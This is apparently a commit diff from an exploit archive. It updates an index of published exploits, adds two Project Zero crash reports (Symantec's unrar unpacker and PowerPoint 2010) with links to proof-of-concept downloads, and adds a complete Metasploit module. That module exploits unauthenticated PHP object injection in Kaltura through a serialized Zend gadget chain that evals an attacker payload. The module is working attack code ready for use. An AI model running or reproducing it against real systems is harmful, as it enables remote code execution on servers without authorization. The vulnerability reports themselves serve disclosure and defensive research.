29475,platforms/multiple/remote/29475.txt,"Oracle January 2007 Security Update - Multiple Vulnerabilities",2007-01-16,"Esteban Martinez Fayo",multiple,remote,0
|
||||
29476,platforms/php/webapps/29476.txt,"Microweber 0.905 - Error Based SQL Injection",2013-11-07,Zy0d0x,php,webapps,0
|
||||
29476,platforms/php/webapps/29476.txt,"Microweber 0.905 - Error-Based SQL Injection",2013-11-07,Zy0d0x,php,webapps,0
|
||||
29389,platforms/multiple/webapps/29389.txt,"Practico 13.9 - Multiple Vulnerabilities",2013-11-03,LiquidWorm,multiple,webapps,0
|
||||
29390,platforms/cgi/webapps/29390.txt,"EditTag 1.2 - edittag.cgi file Variable Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0
|
||||
29391,platforms/cgi/webapps/29391.txt,"EditTag 1.2 - edittag.pl file Variable Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0
|
||||
|
@ -30553,7 +30556,7 @@ id,file,description,date,author,platform,type,port
|
|||
33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - (zero_transact_article.php article_id POST Parameter) SQL Injection",2014-06-23,"Filippos Mastrogiannis",php,webapps,0
|
||||
33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation Null Pointer Denial Of Service",2014-06-13,"A reliable source",windows,dos,0
|
||||
33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 - Memory Consumption Remote Denial of Service",2010-04-27,fallenpegasus,linux,dos,0
|
||||
33851,platforms/php/webapps/33851.txt,"WordPress Theme TimThumb 2.8.13 WebShot Plugin/ - Remote Code Execution",2014-06-24,@u0x,php,webapps,0
|
||||
33851,platforms/php/webapps/33851.txt,"Multiple WordPress Plugins (Using TimThumb 2.8.13 / WordThumb 1.07) - 'WebShot' Remote Code Execution",2014-06-24,@u0x,php,webapps,0
|
||||
33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure",2010-04-22,"Veerendra G.G",multiple,remote,0
|
||||
33860,platforms/windows/dos/33860.html,"Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash PoC (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0
|
||||
33854,platforms/php/webapps/33854.txt,"vBulletin Two-Step External Link Module - 'externalredirect.php' Cross-Site Scripting",2010-04-20,"Edgard Chammas",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
13
platforms/multiple/dos/40405.txt
Executable file
13
platforms/multiple/dos/40405.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=867
|
||||
|
||||
In issue 810 we pointed out to Symantec that they hadn't updated their unrar based unpacker for years, and it was vulnerable to dozens of publicly documented flaws.
|
||||
|
||||
I had expected Symantec to rebase on 5.4.2 (the latest version as of this writing), but they appear to have just backported fixes for the few issues I sent them.
|
||||
|
||||
Here are two known bugs in unrar that are fixed upstream, but not in Symantec's ancient code. If they continue to refuse to rebase, this might take a few iterations to shake the bugs out. Sigh.
|
||||
|
||||
As in issue 810, these are remote code execution vulnerabilities at the highest possible privilege level.
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40405.zip
|
101
platforms/php/remote/40404.rb
Executable file
101
platforms/php/remote/40404.rb
Executable file
|
@ -0,0 +1,101 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Kaltura Remote PHP Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an Object Injection vulnerability in Kaltura.
|
||||
By exploiting this vulnerability, unauthenticated users can execute
|
||||
arbitrary code under the context of the web server user.
|
||||
|
||||
Kaltura has a module named keditorservices that takes user input
|
||||
and then uses it as an unserialized function parameter. The constructed
|
||||
object is based on the SektionEins Zend code execution POP chain PoC,
|
||||
with a minor modification to ensure Kaltura processes it and the
|
||||
Zend_Log function's __destruct() method is called. Kaltura versions
|
||||
prior to 11.1.0-2 are affected by this issue.
|
||||
|
||||
This module was tested against Kaltura 11.1.0 installed on CentOS 6.8.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Security-Assessment.com', # discovery
|
||||
'Mehmet Ince <mehmet@mehmetince.net>' # msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['EDB', '39563']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [ ['Automatic', {}] ],
|
||||
'DisclosureDate' => 'Mar 15 2016',
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The target URI of the Kaltura installation', '/'])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def check
|
||||
r = rand_text_alpha(15 + rand(4))
|
||||
cmd = "print_r(#{r}).die()"
|
||||
|
||||
p = ""
|
||||
p << "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";"
|
||||
p << "a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\00*\00_eventsToMail\";"
|
||||
p << "a:1:{i:0;i:1;}s:22:\"\00*\00_layoutEventsToMail\";a:0:{}s:8:\"\00*\00_mail\";"
|
||||
p << "O:9:\"Zend_Mail\":0:{}s:10:\"\00*\00_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\00*\00_inflector\";"
|
||||
p << "O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\00*\00_matchPattern\";s:7:\"/(.*)/e\";"
|
||||
p << "s:15:\"\00*\00_replacement\";s:#{cmd.length.to_s}:\"#{cmd}\";}s:20:\"\00*\00_inflectorEnabled\";"
|
||||
p << "b:1;s:10:\"\00*\00_layout\";s:6:\"layout\";}s:22:\"\00*\00_subjectPrependText\";N;}}};}"
|
||||
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php/keditorservices/redirectWidgetCmd'),
|
||||
'vars_get' => {
|
||||
'kdata' => Rex::Text.encode_base64(p)
|
||||
}
|
||||
)
|
||||
|
||||
if res && res.body.include?(r)
|
||||
Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
cmd = "print_r(eval(base64_decode('#{Rex::Text.encode_base64(payload.encode)}'))).die()"
|
||||
|
||||
p = ""
|
||||
p << "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";"
|
||||
p << "a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\00*\00_eventsToMail\";"
|
||||
p << "a:1:{i:0;i:1;}s:22:\"\00*\00_layoutEventsToMail\";a:0:{}s:8:\"\00*\00_mail\";"
|
||||
p << "O:9:\"Zend_Mail\":0:{}s:10:\"\00*\00_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\00*\00_inflector\";"
|
||||
p << "O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\00*\00_matchPattern\";s:7:\"/(.*)/e\";"
|
||||
p << "s:15:\"\00*\00_replacement\";s:#{cmd.length.to_s}:\"#{cmd}\";}s:20:\"\00*\00_inflectorEnabled\";"
|
||||
p << "b:1;s:10:\"\00*\00_layout\";s:6:\"layout\";}s:22:\"\00*\00_subjectPrependText\";N;}}};}"
|
||||
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php/keditorservices/redirectWidgetCmd'),
|
||||
'vars_get' => {
|
||||
'kdata' => Rex::Text.encode_base64(p)
|
||||
}
|
||||
)
|
||||
end
|
||||
end
|
86
platforms/windows/dos/40406.txt
Executable file
86
platforms/windows/dos/40406.txt
Executable file
|
@ -0,0 +1,86 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=866
|
||||
|
||||
The following crash was observed in Microsoft PowerPoint 2010 running under Windows 7 x86 with application verifier enabled.
|
||||
|
||||
File versions are:
|
||||
mso.dll: 14.0.7166.5000
|
||||
ppcore.dll: 14.0.7168.5000
|
||||
|
||||
Attached crashing file: 3525170180.ppt
|
||||
|
||||
Crashing context:
|
||||
|
||||
eax=1979aea0 ebx=1638bb50 ecx=1979aea0 edx=0024e340 esi=00000000 edi=00000000
|
||||
eip=663088d8 esp=0024e330 ebp=0024e330 iopl=0 nv up ei pl nz na pe nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
|
||||
ppcore!DllGetLCID+0x18205e:
|
||||
663088d8 ff7110 push dword ptr [ecx+10h] ds:0023:1979aeb0=????????
|
||||
|
||||
Call Stack:
|
||||
|
||||
ChildEBP RetAddr Args to Child
|
||||
WARNING: Stack unwind information not available. Following frames may be wrong.
|
||||
0024e330 663088cc 1979aea0 0024e46c 00000000 ppcore!DllGetLCID+0x18205e
|
||||
0024e350 663072cb 0024e46c e437cde4 00000000 ppcore!DllGetLCID+0x182052
|
||||
0024e4c8 662fcbda 1cd76fe8 0024e4f0 0024e574 ppcore!DllGetLCID+0x180a51
|
||||
0024e598 662fc9ee 00000000 0024e5e0 0024e63e ppcore!DllGetLCID+0x176360
|
||||
0024e5ac 662e82fd 0024e5e0 0024e63e e4362e14 ppcore!DllGetLCID+0x176174
|
||||
00250738 662e7c88 17802ef8 073def40 1638bb50 ppcore!DllGetLCID+0x161a83
|
||||
00250774 6619d3e9 002508a4 00250890 1638bb50 ppcore!DllGetLCID+0x16140e
|
||||
|
||||
Disassembly:
|
||||
|
||||
663088d2 55 push ebp
|
||||
663088d3 8bec mov ebp,esp
|
||||
663088d5 8b4d08 mov ecx,dword ptr [ebp+8]
|
||||
663088d8 ff7110 push dword ptr [ecx+10h] ds:0023:1979aeb0=????????
|
||||
|
||||
The ecx register is pointing to invalid memory in this crash. Looking at the call stack and disassembly above we can see that this value was passed in as the first argument to the crashing function. The calling function obtained this value from a pointer in stack memory at 0x0024e46c + 0x10:
|
||||
|
||||
0:000> dd poi(0024e46c)
|
||||
1cb7cfa0 00000000 1cb7cfa0 00000002 19045ea0
|
||||
1cb7cfb0 1979aea0 00000000 00000000 00000000
|
||||
|
||||
We can verify that this is allocated memory and find the function that allocated it:
|
||||
|
||||
(address changed between runs and is now 0x1cb7cfa0)
|
||||
|
||||
0:000> !heap -p -a 1cb7cfa0
|
||||
address 1cb7cfa0 found in
|
||||
_DPH_HEAP_ROOT @ 1261000
|
||||
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
|
||||
1d2b14e0: 1cb7cfa0 5c - 1cb7c000 2000
|
||||
6f748e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
|
||||
7719616e ntdll!RtlDebugAllocateHeap+0x00000030
|
||||
7715a08b ntdll!RtlpAllocateHeap+0x000000c4
|
||||
77125920 ntdll!RtlAllocateHeap+0x0000023a
|
||||
72eaad1a vrfcore!VerifierSetAPIClassName+0x000000aa
|
||||
701f16ac vfbasics+0x000116ac
|
||||
641a6cca mso!Ordinal149+0x000078e0
|
||||
66118132 ppcore!PPMain+0x00001244
|
||||
662fcbda ppcore!DllGetLCID+0x00176360
|
||||
662fc9ee ppcore!DllGetLCID+0x00176174
|
||||
662e82fd ppcore!DllGetLCID+0x00161a83
|
||||
|
||||
Setting breakpoints on ppcore!DllGetLCID+0x00176360 and subsequent memory write access breakpoints at eax+0x10 (there are multiple hits) eventually resulted in the same file crashing with a different context:
|
||||
|
||||
eax=00000000 ebx=17c2cb50 ecx=00000000 edx=00000000 esi=1a36eea0 edi=1a36eea0
|
||||
eip=6625a361 esp=0022e1d0 ebp=0022e1f8 iopl=0 nv up ei ng nz ac po cy
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210293
|
||||
ppcore!DllGetLCID+0xd3ae7:
|
||||
6625a361 8b4870 mov ecx,dword ptr [eax+70h] ds:0023:00000070=????????
|
||||
|
||||
0:000> kb
|
||||
ChildEBP RetAddr Args to Child
|
||||
WARNING: Stack unwind information not available. Following frames may be wrong.
|
||||
0022e1f8 662d7d30 661813c4 ec3f4e62 00000000 ppcore!DllGetLCID+0xd3ae7
|
||||
0022e220 663088e2 00000000 661813c4 0022e250 ppcore!DllGetLCID+0x1514b6
|
||||
0022e230 663088cc 1a36eea0 0022e36c 00000000 ppcore!DllGetLCID+0x182068
|
||||
0022e250 663072cb 0022e36c ec3f4f8a 00000000 ppcore!DllGetLCID+0x182052
|
||||
0022e3c8 662fcbda 1c7a4fe8 0022e3f0 0022e474 ppcore!DllGetLCID+0x180a
|
||||
|
||||
Given the different crashing contexts related to timing when breakpoints are set I suspect this to be a heap corruption bug that Application Verifier does not detect.
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40406.zip
|
Loading…
Add table
Reference in a new issue